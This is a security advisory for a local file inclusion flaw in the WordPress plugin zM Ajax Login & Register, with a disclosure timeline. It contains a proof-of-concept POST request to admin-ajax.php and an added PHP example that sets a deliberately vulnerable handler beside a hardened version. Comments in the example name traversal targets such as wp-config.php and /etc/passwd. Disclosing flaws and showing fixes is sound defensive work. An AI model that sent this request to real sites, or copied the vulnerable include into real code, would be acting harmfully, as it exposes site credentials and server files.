zM Ajax Login & Register [Local File Inclusion]

The WordPress plugin zM Ajax Login & Register suffers from a Local File Inclusion vulnerability.

Description

Any user, authenticated or not, can perform a local file inclusion attack by exploiting the wp_ajax_nopriv_load_template action. The plugin simply includes the file specified in the 'template' POST parameter without any further validation; the only check is the WordPress nonce passed in the 'security' parameter.

Proof of Concept

Send a POST request to

http://my.vulnerable.website.com/wp-admin/admin-ajax.php

with data:

action=load_template&template=[relative path to local file]&security=[wp nonce]&referer=[action from which the nonce came from]
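The pattern the description and the proof of concept above point at, written out as an added example (not the plugin's own code, and not the fix shipped in 1.1.0, which this page does not show): an AJAX handler that includes whatever the 'template' parameter names, next to one hardened variant. The function names, the nonce action 'zm_alr_nonce', the templates directory and the allowlisted template names are assumptions for the illustration; the idea that the nonce action name is taken from the 'referer' parameter is a reading of the PoC's parameter list, also marked as assumed.

```php
<?php
// Added example; not the plugin's code. Names below are assumptions.

// VULNERABLE: whatever 'template' names is included relative to the plugin
// directory, so ../../wp-config.php or ../../../../etc/passwd is read and
// executed. The nonce action name is assumed to come from the 'referer'
// parameter (as the PoC suggests), so the nonce does not restrict this.
function vulnerable_load_template() {
    $action = isset( $_POST['referer'] ) ? $_POST['referer'] : '';
    check_ajax_referer( $action, 'security' );
    $template = isset( $_POST['template'] ) ? $_POST['template'] : '';
    include plugin_dir_path( __FILE__ ) . $template; // no validation at all
    wp_die();
}

// HARDENED: a fixed nonce action, an allowlist of template names, and a
// check that the resolved path stays inside the plugin's templates folder.
function hardened_load_template() {
    check_ajax_referer( 'zm_alr_nonce', 'security' ); // assumed action name

    $allowed  = array( 'login', 'register', 'lost-password' ); // assumed names
    $template = isset( $_POST['template'] ) ? sanitize_key( $_POST['template'] ) : '';

    if ( ! in_array( $template, $allowed, true ) ) {
        wp_send_json_error( 'unknown template', 400 ); // calls wp_die()
    }

    $base = realpath( plugin_dir_path( __FILE__ ) . 'templates' );
    $path = realpath( $base . DIRECTORY_SEPARATOR . $template . '.php' );

    // Belt and braces: even with an allowlist, refuse anything that resolves
    // outside the templates directory (symlinks, later code changes).
    if ( false === $base || false === $path
         || 0 !== strpos( $path, $base . DIRECTORY_SEPARATOR ) ) {
        wp_send_json_error( 'invalid template path', 400 );
    }

    include $path;
    wp_die();
}

add_action( 'wp_ajax_load_template',        'hardened_load_template' );
add_action( 'wp_ajax_nopriv_load_template', 'hardened_load_template' );
```

The allowlist is the real control; the realpath check is a second layer so that a future change to how the path is built cannot silently reopen the traversal. A nonce on its own never prevents LFI here, because the nonce is handed out to unauthenticated visitors who load the login or register form, which is exactly the population the nopriv hook serves.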

TIMELINE
  • 2015-06-01: Discovered
  • 2015-06-01: Vendor alerted via the contact form on their website
  • 2015-06-03: Vendor responded
  • 2015-06-03: Version 1.1.0 released, resolving the issue